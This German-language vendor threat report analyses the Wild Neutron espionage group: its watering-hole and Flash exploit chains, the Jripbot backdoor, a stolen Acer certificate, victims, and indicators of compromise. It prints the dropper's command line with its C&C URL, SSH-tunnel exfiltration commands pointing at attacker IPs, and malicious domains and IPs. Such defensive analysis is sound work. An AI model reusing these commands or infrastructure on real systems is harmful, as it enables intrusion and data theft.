Wild Neutron – Wirtschaftsspionage-Bedrohung kehrt mit neuen Tricks zurück

Indicators of Compromise (IOC)

Gestohlenes Acer-Zertifikat und unbekanntes Flash Player-Exploit in Angriffen eingesetzt

Ein mächtiger Bedrohungsakteur, bekannt als “Wild Neutron” (alias “Jripbot” oder “Morpho“) ist spätestens seit dem Jahr 2011 aktiv und hat mehrere Jahre lang prominente Unternehmen infiziert, wobei er eine Kombination von Exploits, Wasserlöchern und Plattform übergreifender Malware verwendete.

Bei der jüngsten Angriffswelle im Jahr 2015 wird ein gestohlenes, Code signierendes Zertifikat eingesetzt, das dem taiwanesischen Elektronikhersteller Acer gehört, sowie ein unbekanntes Flash Player-Exploit.

Wild Neutron erregte im Jahr 2013 allgemeine Aufmerksamkeit, als der Bedrohungsakteur erfolgreich so bekannte Unternehmen wie Apple, Facebook, Twitter und Microsoft angriff. Diese Attacken machten sich eine Java Zero-Day-Schwachstelle zunutze und setzten gehackte Foren als Wasserlöcher ein. Über die Vorfälle im Jahr 2013 wurde ausführlich in den Massenmedien berichtet und in der Folge verschwand der Bedrohungsakteur für fast ein Jahr in der Versenkung.

Im Spätjahr 2013 und zu Beginn des Jahres 2014 setzten die Attacken erneut ein und dauern auch im Jahr 2015 noch an. Zu den Zielen dieser neuen Angriffswelle gehören:

  • Anwaltskanzleien
  • Bitcoin-Unternehmen
  • Investmentfirmen
  • Große Unternehmensgruppen, die meist auf dem Markt mit Fusionen und Übernahmen (M&A) tätig sind
  • IT-Unternehmen
  • Firmen aus dem Gesundheitswesen
  • Immobilienfirmen
  • Individuelle Anwender

Der Fokus dieser Attacken lässt vermuten, dass es sich nicht um einen Akteur handelt, der von einem Nationalstaat beauftragt wurde. Doch der Einsatz von Zero-Days und von Plattform übergreifender Malware sowie anderer Techniken legt den Schluss nahe, dass wir es hier mit einer mächtigen Größe zu tun haben, die Spionage betreibt, und zwar vermutlich aus wirtschaftlichen Gründen.

Ältere Kampagnen (2013)

Im Zuge der Attacken im Jahr 2013 hat der Wild Neutron Akteur erfolgreich die Website www.iphonedevsdk[.]com – ein Forum für iPhone-Entwickler – kompromittiert und sich diese zunutze gemacht.

Die Angreifer schleusten ein Script in das Forum ein, das die Besucher auf eine andere Website umleitete (min.liveanalytics[.]org – aktuell von Kaspersky Lab auf einen SINKHOLE-Server umgeleitet), die ein Java-Zero-Day-Exploit beherbergte. Eine ähnliche Attacke wurde in einem anderen Forum beobachtet, dieses Mal eins für Linux-Entwickler: fedoraforum[.]org. Eine detaillierte Analyse der Attacken von 2013 finden Sie in Eric Romangs Blog.

Hier einige weitere von der Wild Neutron-Gruppe kompromittierte und durch Berichte des Kaspersky Security Networks identifizierte Foren:

  • expatforum.com
  • mygsmindia.com
  • forum.samdroid.net
  • emiratesmac.com
  • forums.kyngdvb.com
  • community.flexispy.com
  • ansar1.info

Insbesondere zwei stechen hervor, und zwar: “community.flexispy[.]com” und “ansar1[.]info“. Das erste ist eine von Flexispy unterhaltene Community, ein Unternehmen, das Spionagesoftware für mobile Geräte vertreibt. Das zweite ist ein Jihadistenforum, das aktuell geschlossen ist.

Wild Neutron – Wirtschaftsspionage-Bedrohung kehrt mit neuen Tricks zurück

ansar1[.]info wurde 2013 von Wild Neutron kompromittiert

Im Jahr 2013 benutzten die Angreifer außerdem eine Mac OS X-Backdoor, die unter der Bezeichnung OSX/Pintsized bekannt ist. Auch das ist in Einzelheiten in Eric Romangs hervorragendem Blog beschrieben. Dieselbe Backdoor, kompiliert für Win32, wird noch immer in den aktuellen Angriffen verwendet.

Zu den prominentesten Opfern der 2013er-Attacken gehörten Twitter, Facebook, Apple und Microsoft. Über diese Vorfälle wurde ausführlich in der Presse berichtet und einige der betroffenen Unternehmen haben sich selbst dazu geäußert (siehe die Erklärung von Facebook).

Das Attackieren großer und größter IT-Unternehmen wie Facebook, Twitter, Apple und Microsoft ist zwar ungewöhnlich, aber auch nicht einmalig. Das Fehlen von Opfern aus anderen Bereichen, wie z.B. aus diplomatischen oder staatlichen Institutionen, ist jedoch ziemlich ungewöhnlich. Wir vermuten daher, dass wir es nicht mit Angriffen zu tun haben, die von Nationalstaaten in Auftrag gegeben wurden.

Technische Analyse

Das von der Wild Neutron-Gruppe verwendete Malwarepaket besteht aus verschiedenen Komponentengruppen:

  • Ein Haupt-Backdoor-Modul, das die Erstkommunikation mit dem C&C-Server initiiert;
  • mehrere Informationen sammelnde Module;
  • Ausnutzungs-Tools
  • SSH-basierte Ausschleusungs-Tools;
  • Zwischenlader und Dropper, die die Payloads entschlüsseln und ausführen.

Auch wenn sie maßgeschneidert sind, scheinen einige der Module zu einem großen Teil auf Open-Source-Tools zu basieren (d.h. der Passwort-Dumper ähnelt dem Code von Mimikatz und Pass-The-Hash Toolkit) und auf kommerzieller Malware (das HTTPS-Proxy-Modul ist mit dem von Hesperbot verwendeten praktisch identisch).

Die gesamte C&C-Kommunikation ist mit einem maßgefertigten Protokoll verschlüsselt. Die abgeworfenen ausführbaren Dateien und die hart codierten Strings sind normalerweise mit XOR obfuskiert (abhängig von der Bot-Version). Das Haupt-Backdoor-Modul umfasst eine Reihe von Umgehungstechniken, die Sandboxes und Emulations-Engines aufspüren und deaktivieren sollen.

Ausnutzung – 2015

Der Erstinfektionsvektor der Attacken von 2014-2015 ist noch immer unbekannt, auch wenn es klare Hinweise darauf gibt, dass die Opfer von einem Kit ausgenutzt werden, das ein unbekanntes Flash Player-Exploit verwendet.

In einem der Angriffe wurde die folgende Ausnutzungsfolge beobachtet:

Site hxxp://cryptomag.mediasource.ch/
Pfade /favicon.ico
/msie9html5.jpg
/loader-large.gif
/bootstrap.min.css
/stats.js?d=1434374526478
/autoload.js?styleid=20&langid=5&sid=883f2efa&d=1434374526
/banner.html?styleid=19&langid=23&sid=883f2efa&d=1434374526
/883f2efa/bniqligx.swf?styleid=4&langid=6&sid=883f2efa&d=1434374533
/883f2efa/pzixfgne?styleid=5&langid=25&sid=883f2efa&d=1434374533
/883f2efa/bniqligx.swf?styleid=4&langid=6&sid=883f2efa&d=1434374533/
/background.jpg

Die Subdomain cryptomag.mediasource[.]ch scheint für diese Attacke erstellt worden zu sein; sie verwies auf eine IP-Adresse, die mit anderen C&Cs von Wild Neutron in Verbindung gebracht wird, welche unten stehend rot markiert sind:

Wild Neutron – Wirtschaftsspionage-Bedrohung kehrt mit neuen Tricks zurück

Hosts, die nach 66.55.133[.]89 auflösen

Während app.cloudprotect[.]eu und ssl.cloudprotect[.]eu zwei bekannte Wild Neutron C&Cs sind, scheint cryptomag.mediasource[.]ch zu Ausnutzungszwecken auf diese IP verwiesen zu haben. Oben ist noch eine andere verdächtige Domain aufgeführt, und zwar secure.pdf-info[.]com. Wir haben bisher noch keine Attacken gesehen, die mit diesem Hostnamen in Verbindung stehen, doch das Namensmuster weist darauf hin, dass sie ebenfalls schädlich ist.

In einer anderen Attacke haben wir eine ähnliche Ausnutzungsfolge beobachten können, die allerdings auf einer anderen Website gehostet wurde, und zwar auf hxxp://find.a-job.today/.

In beiden Fällen surfen die Besucher auf die Website oder werden über ein gefälschtes Online-Stellenangebot dorthin geleitet. Von dort aus erscheint in beiden Fällen “autoload.js”, das wiederum zu einer anderen willkürlich benannten HTML-Datei führt, die schließlich eine willkürlich benannte SWF-Datei lädt.

Während die Gruppe im Jahr 2013 Wasserloch-Angriffe durchführte, ist noch immer unklar, wie die Opfer in den neuen Attacken der Jahre 2014/2015 auf die Exploitation-Kits umgeleitet werden. Anstelle von Flash-Exploits nutzten älterer Wild Neutron-Schemata und Wasserlöcher etwas, das Ende 2012 und Anfang 2013 ein Java-Zero-Day war und die Produkte von Kaspersky Lab als Exploit.Java.CVE-2012-3213.b detektierten.

Der Haupt-Malware-Dropper

Die Funktionalität des Hauptdroppers ist relativ simpel: Er entschlüsselt die ausführbare Backdoor-Datei (als Ressource gespeichert und mit einem einfachen XOR 0x66 verschlüsselt), schreibt sie in einen spezifischen Pfad und führt sie dann mit den Parametern aus, die in den Code des Dropperkörpers geschrieben sind. Einer der Parameter ist die URL des C&C-Servers, während andere verschiedene Konfigurationsoptionen für die Bots beinhalten.

Beispiele für vom Dropper verwendete Parameter:

igfxupt.exe https://app.cloudprotect[.]eu:443 /opts resolv=logs.cloudprotect[.]eu

Nach Ausführung der Haupt-Backdoor wird der Dropper sicher gelöscht, indem sein Inhalt mehrmals mit willkürlichen Zahlen überschrieben wird, bevor die Datei umbenannt und entfernt wird.

Die Haupt-Backdoor (alias “Jripbot”)

Diese Binärdatei wird mit der URL-Adresse des C&C-Servers als ein Parameter ausgeführt; sie kann zudem eine optionale Bot-Konfiguration erhalten. Diese Information wird dann doppelt verschlüsselt – zuerst mit RC4 und dann mit der Windows-Funktion CryptProtectData – und in der Registry gespeichert.

Bevor irgendeine andere Aktivität verrichtet wird, führt die Malware zunächst ihren Stalling-Code aus (der dazu dient, die Emulatoren auszutricksen), führt daraufhin verschiedene Anti-Sandboxing-Checks durch und tritt dann – wenn irgendwelche unerwünschte Software in dem System gefunden wird – in eine Endlosschleife ein.

Andernfalls überprüft die Schadsoftware:

  • die Betriebssystemversion,
  • ob das Programm unter WOW64 läuft,
  • ob der aktuelle Nutzer über Administratorenrechte verfügt,
  • welche Sicherheitsfeatures von Windows aktiviert sind,
  • Nutzer- und Computername,
  • Servername und LAN-Gruppe,
  • Informationen über die logischen Laufwerke,
  • Betriebszeit und Inaktivitätszeit des System (uptime und idle time),
  • die standardmäßigen Webbrowser,
  • die Proxy-Einstellungen.

Auf der Grundlage einiger dieser Informationen erzeugt die Malware eine einzigartige ID für das Opfer und startet die C&C-Kommunikation, indem sie den ID-Wert sendet und Befehle erwartet.

Die Konfigurationsoptionen der Backdoor können die Proxyserver-Adresse und Anmeldedaten, Sleeptime-/Verzögerungswerte und Verbindungstyp enthalten, aber am interessantesten ist die Option resolv=[url] option. Ist diese Option aktiviert, generiert die Malware einen Domainnamen, der aus dem Computernamen, einer einmaligen ID und der URL besteht, die mit dieser Option durchlaufen wird; dann versucht sie, die IP-Adresse dieser Domain aufzulösen. Wir vermuten, dass die Angreifer diese Methode verwenden, um die erzeugte UID an den C&C-Server zu senden.

Die Befehle vom C&C können den Bot zum Ausführen der folgenden Aktionen veranlassen:

  • Das aktuelle Verzeichnis in das angefragte umändern;
  • einen willkürlichen Befehl in der Befehlszeile ausführen;
  • den autorun-Wert für sich selbst in der Registry einstellen;
  • den autorun-Wert für sich selbst in der Registry löschen;
  • eine angefragte Datei schreddern (den Dateiinhalt mit willkürlichen Zahlen überschreiben, den Dateinamen mit Nullen überschreiben und sie dann löschen);
  • eine Datei aus dem Internet herunterladen und auf der Festplatte speichern (optional verschlüsselt);
  • zusätzliche Malware-Plugins installieren oder deinstallieren;
  • Informationen sammeln und senden;
  • Laufwerke durchzählen;
  • einen Sleeptime-Wert einstellen;
  • die Konfiguration aktualisieren;
  • sich selbst aktualisieren
  • beenden.

Ältere Versionen dieser Backdoor, die in den Attacken im Jahr 2013 verwendet wurden, verfügten über einige zusätzliche Funktionen:

  • Sammeln von Passwörtern;
  • Scannen von Ports;
  • Erstellen von Screenshots;
  • Senden von Dateien zum C&C;
  • Reverse Shell.

Diese Funktionen wurden aus den neueren Versionen der Backdoor, die in den jüngsten Attacken eingesetzt werden, entfernt. Stattdessen führten die Entwickler der Schadsoftware einen Plugin-Mechanismus ein und setzen verschiedene Tools für verschiedene Aufgaben ein. Das ist ein deutlicher Schritt in Richtung einer flexibleren modularen Architektur.

Hinsichtlich ihrer Funktionalität unterscheidet sich die Haupt-Backdoor nicht von vielen anderen Remote Access Tools (RATs – Fernwartungssoftware). Ein wirklich hervorstechendes Merkmal dieser Gruppe ist die Vorsicht und die Sorgfalt, mit der die Angreifer die Adresse des C&C-Servers verbergen, indem sie sie mit maschinenabhängigen Informationen in der Registry verschlüsselt. Ebenfalls bemerkenswert ist die Wiederherstellungsfähigkeit nach der Stilllegung eines C&C-Servers, indem ein dynamisch generierter Domainname kontaktiert wird, den nur die Angreifer im Voraus kennen, da er direkt mit jedem individuellen Opfer verknüpft ist.

Dem Zeitstempel der Samples zufolge stellt sich die Verteilung folgendermaßen dar:

Wild Neutron – Wirtschaftsspionage-Bedrohung kehrt mit neuen Tricks zurück

Jede Backdoor scheint eine interne Versionsnummer zu haben, die in den jüngsten Samples zwischen 11000 und 16000 liegt. Dadurch können wir die folgende Entwicklungskarte zeichnen:

In den Attacken des Jahres 2013 verwendete Backdoors:

MD5 Zeitstempel Version Dateiname Größe
1582d68144de2808b518934f0a02bfd6 29 Nov 2012 11000 javacpl.exe 327168
14ba21a3a0081ef60e676fd4945a8bdc 30 Nov 2012 12000 javacpl.exe 329728
0fa3657af06a8cc8ef14c445acd92c0f 09 Jan 2013 13000 javacpl.exe 343552

In den Attacken der Jahre 2014 und 2015 verwendete Backdoors:

MD5 Zeitstempel Version Dateiname Größe
95ffe4ab4b158602917dd2a999a8caf8 13 Dez. 2013 14014 LiveUpdater.exe 302592
342887a7ec6b9f709adcb81fef0d30a3 20 Juni 2014 15013 FlashUtil.exe 302592
dee8297785b70f490cc00c0763e31b69 02 Aug. 2013
(eventuell gefälscht)
16010 IgfxUpt.exe 291328
f0fff29391e7c2e7b13eb4a806276a84 27 Okt. 2014 16017 RtlUpd.exe 253952

Die Installer haben ebenfalls Versionsnummern, die auf die folgende Entwicklung schließen lassen:

MD5 Zeitstempel Version
1f5f5db7b15fe672e8db091d9a291df0 16. Dez. 2011 1.4.1
48319e9166cda8f605f9dce36f115bc8 28. Sep. 2012 1.5.0
088472f712d1491783bbad87bcc17c48 12. Apr. 2013 1.6.3
ee24a7ad8d137e54b854095188de0bbf 07. Jan. 2014 1.6.4

Seitwärtsbewegung

Nach Installation der Haupt-Backdoor und Aufbau der Erstkommunikation mit dem C2 setzen die Angreifer ein breites Spektrum von unterschiedlichen Tools ein, um sensitive Daten zu entnehmen und die Kontrolle über den Rechner des Opfers zu erlangen. Zu diesen Tools gehören ein Passwort sammelnder Trojaner, eine Reverse-Shell-Backdoor und maßgeschneiderte Implementierungen von OpenSSH, WMIC und SMB. Manchmal laden sie lediglich eine einfache Perl Reverse-Shell ab und setzen verschiedene Methoden ein, um Anmeldedaten von einer Auswahl von Rechnern zu sammeln, Privilegien zu erhöhen und von dort aus ins Netzwerk auszuschwärmen. Neben diesen Tools gibt es außerdem eine Reihe von kleinen Modulen mit unterschiedlichster Funktionalität – von Loadern und Konfigurationstools bis hin zu Dateischreddern und Netzwerk-Proxys.

Erwähnenswert ist auch, dass dieser Bedrohungsakteur in hohem Maße auf schon existierendem Code basiert und öffentlich verfügbare Open Source-Apps nutzt sowie Metasploit-Tools und durchgesickerten Malware-Quellcode, um sich damit seine eigenen Tools zu basteln. Einige dieser Tools wurden geschaffen, um unter Cygwin zu laufen und sich mit der Cygwin API DLL zu vereinigen. Das könnte darauf hindeuten, dass sich die Angreifer wohler fühlen, wenn sie in einer Linux-artigen Umgebung arbeiten.

SSH Tunnel-Backdoor

Im Laufe der Attacken 2014/2015 beobachteten wir, dass die Angreifer maßgeschneiderte, OpenSSH-basierte Win32 Tunnel-Backdoors bereitstellten, die verwendet werden, um große Datenmengen zuverlässig abzutransportieren. Diese Tunnel-Backdoors sind als “updt.dat” geschrieben und werden mit zwei Parametern ausgeführt, -z and -p. Diese Parameter bestimmen, mit welcher IP eine Verbindung hergestellt werden soll, sowie den Port. Anstelle von Port Nummer 443, ist das eine SSH-Verbindung:

  • /d /u /c updt.dat -z 185.10.58.181 -p 443
  • /d /u /c updt.dat -z 46.183.217.132 -p 443
  • /d /u /c updt.dat -z 217.23.6.13 -p 443

Zur Authentifikation enthält die SSH-Tunnel-Backdoor einen hart codierten privaten RSA-Schlüssel.

Das gestohlene Zertifikat

Im Zuge der Angriffe im laufenden Jahr 2015 benutzte Wild Neutron einen Dropper, der mit einem gestohlenen, aber noch immer gültigen Zertifikat von Acer Incorporated signiert war.

Wild Neutron – Wirtschaftsspionage-Bedrohung kehrt mit neuen Tricks zurück

Acer-Signatur in Wild Neutron-Dropper

Das missbrauchte Zertifikat hat die folgenden Eigenschaften:

Seriennummer: 5c c5 3b a3 e8 31 a7 df dc 7c 28 d5 15 8f c3 80
Daumenabdruck: 0d 85 91 41 ee 9a 0c 6e 72 5f fe 6b cf c9 9f 3e fc c3 fc 07

Der Dropper (dbb0ea0436f70f2a178a60c4d8b791b3) wurde anscheinend am 15. Juni 2015 signiert. Er entlädt eine Jripbot-Backdoor als “IgfxUpt.exe” und konfiguriert sie für die Verwendung des C&C “app.cloudprotect[.]eu”.

Wir haben mit Symantec, Verisign und Acer zusammengearbeitet, um das kompromittierte Zertifikat zurückzurufen.

Opfer und Statistiken

Die Attacken der Wild Neutron-Gruppe scheinen hochgradig zielgerichtet zu sein. Im Laufe unserer Untersuchung konnten wir verschiedene Opfer in 11 Ländern der Welt identifizieren:

  • Frankreich
  • Russland
  • Schweiz
  • Deutschland
  • Österreich
  • Palästina
  • Slowenien
  • Kasachstan
  • Vereinigte Arabische Emirate
  • Algerien
  • USA

Wild Neutron – Wirtschaftsspionage-Bedrohung kehrt mit neuen Tricks zurück

Die Opfer der Versionen aus den Jahren 2014-2015 stammten grundsätzlich aus den Bereichen IT und Immobilien/Investment, und in beiden Fällen wurde eine kleine Zahl von Computern innerhalb der Organisationen infiziert. Die Angreifer scheinen das Malwareimplantat aktualisiert zu haben und einige zusätzliche Tools bereitzustellen, doch wir konnten in diesen Fällen keine ernsthafte Seitwärtsbewegung beobachten.

Attribution

Da der Bedrohungsakteur verschiedene Unternehmen angreift, die nicht direkt mit Regierungen in Verbindung stehen, glauben wir, dass es sich nicht um einen staatlich geförderten APT handelt. Die Angreifer haben außerdem ein Interesse an Investmentfirmen gezeigt, was vermuten lässt, dass sie über das entsprechende Wissen und die Fähigkeiten verfügen, um solche Informationen auf dem Markt auszunutzen und sie in einen finanziellen Vorteil zu verkehren.

In einigen der Samples enthält die verschlüsselte Konfiguration eine Zeile in rumänischer Sprache, die verwendet wird, um das Ende der C&C-Kommunikation zu markieren:

Wild Neutron – Wirtschaftsspionage-Bedrohung kehrt mit neuen Tricks zurück

Interessanterweise bedeutet “La revedere” auf Rumänisch „auf Wiedersehen“. Darüber hinaus haben wir einen weiteren nicht-englischen String gefunden, und zwar die lateinische Transkription des russischen Worts Успешно (“uspeshno” -> “erfolgreich”). Dieser String wird nach Ausführung eines C2-Befehls in eine Pipe geschrieben.

Eins der Samples hat den internen Namen “WinRAT-Win32-Release.exe”. Das hat vermutlich zu bedeuten, dass die Autoren ihre Malware “WinRAT” nennen.

Weitere Informationen über die Attribution von Wild Neutron sind für Kunden von Kaspersky Intelligence Services verfügbar. Kontakt: intelreports@kaspersky.com

Fazit

Verglichen mit anderen APT-Gruppen ist Wild Neutron eine der ungewöhnlichsten Bedrohungsakteure, die wir je analysiert und beobachtet haben. Seit 2011 aktiv, hat die Gruppe mindestens ein Zero-Day-Exploit verwendet sowie maßgeschneiderte Malware und Tools, und hat es geschafft, seine Daten so weit unter Verschluss zu halten, dass alle Versuche einer Attribution mehr oder minder gescheitert sind. Die Attacken der Gruppe auf große IT-Unternehmen, Spyware-Entwickler (FlexiSPY), Jihadisten-Foren (the “Ansar Al-Mujahideen English Forum”) und Bitcoin-Unternehmen weisen auf eine flexible und dennoch ungewöhnliche Denkweise und ebensolche Interessen hin.

Hier einige charakteristische Merkmale der Gruppe:

  • Verwendung von Open-Source-Tools und durchgesickerten Quellcodes anderer Malware;
  • Verwendung eines gestohlenen Acer-Zertifikats zum Signieren der Malware;
  • Verwendung eines Plattform übergreifenden Zero-Day-Exploit (Java und Flash), gefolgt von einer Plattform übergreifenden Reverse-Shell-Payload (Perl) für das Ersteindringen ins System;
  • Verwendung von *NIX-Code der über Cygwin in Windows portiert wird;
  • massiver Gebrauch von SSH für das Herausschleusen, ein gängiges *NIX-Administrationstool;
  • Verwendung von CryptProtectData API, um die URL des C&C geheim zu halten;
  • ein einfaches Befehlszeilen-Interface, das um alle Malware-Komponenten herumgebaut ist, unter Verwendung von benannten Pipes für die Kommunikation zwischen den Modulen;
  • die Hilfstools sind in C programmiert und die meisten von ihnen enthalten eine integrierte Hilfe, die mit Ausführung der Binärdatei mit einem “–pleh”-Parameter ausgedruckt werden kann.

Wir beobachten die Wild Neutron-Gruppe auch weiterhin, die mit Stand vom Juni 2015 noch immer aktiv ist.

Die Produkte von Kaspersky Lab detektieren die in den Angriffen verwendeten Schadprogramme als:
HEUR:Trojan.Win32.WildNeutron.gen, Trojan.Win32.WildNeutron.*, Trojan.Win32.JripBot.*,
HEUR:Trojan.Win32.Generic

Erfahren Sie hier mehr darüber, wie die Produkte von Kaspersky Lab dabei helfen, Sie vor dem Bedrohungsakteur Wild Neutron zu schützen:
Wild Neutron in freier Wildbahn: Vielleicht sind Sie die nächste Beute

Indicators of Compromise (IOCs)

Bekannte schädliche Hostnamen und Domains:

ddosprotected.eu
updatesoft.eu
app.cloudprotect.eu
fw.ddosprotected.eu
logs.cloudprotect.eu
ssl.cloudprotect.eu
ssl.updatesoft.eu
adb.strangled.net
digitalinsight-ltd.com
ads.digitalinsight-ltd.com
cache.cloudbox-storage.com
cloudbox-storage.com
clust12-akmai.net
corp-aapl.com
fb.clust12-akmai.net
fbcbn.net
img.digitalinsight-ltd.com
jdk-update.com
liveanalytics.org
min.liveanalytics.org
pop.digitalinsight-ltd.com
ww1.jdk-update.com
find.a-job.today
cryptomag.mediasource.ch

Bekannte schädliche IPs:

185.10.58.181
46.183.217.132
64.187.225.231
62.113.238.104
66.55.133.89
217.23.6.13

Bekannte Dateinamen:

%APPDATA%RoamingFlashUtil.exe
%APPDATA%RoamingAcerLiveUpdater.exe
%APPDATA%RoamingRealtekRtlUpd.exe
%ProgramData%RealtekRtlUpd.exe
%APPDATA%Roamingsqlite3.dll (UPX packed)
%WINDIR%winsession.dll
%APPDATA%appdatalocaltempteamviewerversion9update.exe
%SYSTEMROOT%temp_dbg.tmp
%SYSTEMROOT%tempok.tmp
C:windowstempdebug.txt
C:windowssyswow64mshtaex.exe
%SYSROOT%System32mshtaex.exe
%SYSROOT%System32wdigestEx.dll
%SYSROOT%System32dpcore16t.dll
%SYSROOT%System32iastor32.exe
%SYSROOT%System32mspool.dll
%SYSROOT%System32msvcse.exe
%SYSROOT%System32mspool.exe
C:Program Files (x86)LNVSuiteLnrAuth.dll
C:Program Files (x86)LNVSuiteLnrAuthSvc.dll
C:Program Files (x86)LNVSuiteLnrUpdt.exe
C:Program Files (x86)LNVSuiteLnrUpdtP.exe
DF39527~.tmp

Benannte Pipes:

.pipewinsession
.pipelsassw

Events & Mutexes:

GlobalLnrRTPDispatchEvents
_Winlogon_TCP_Service

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.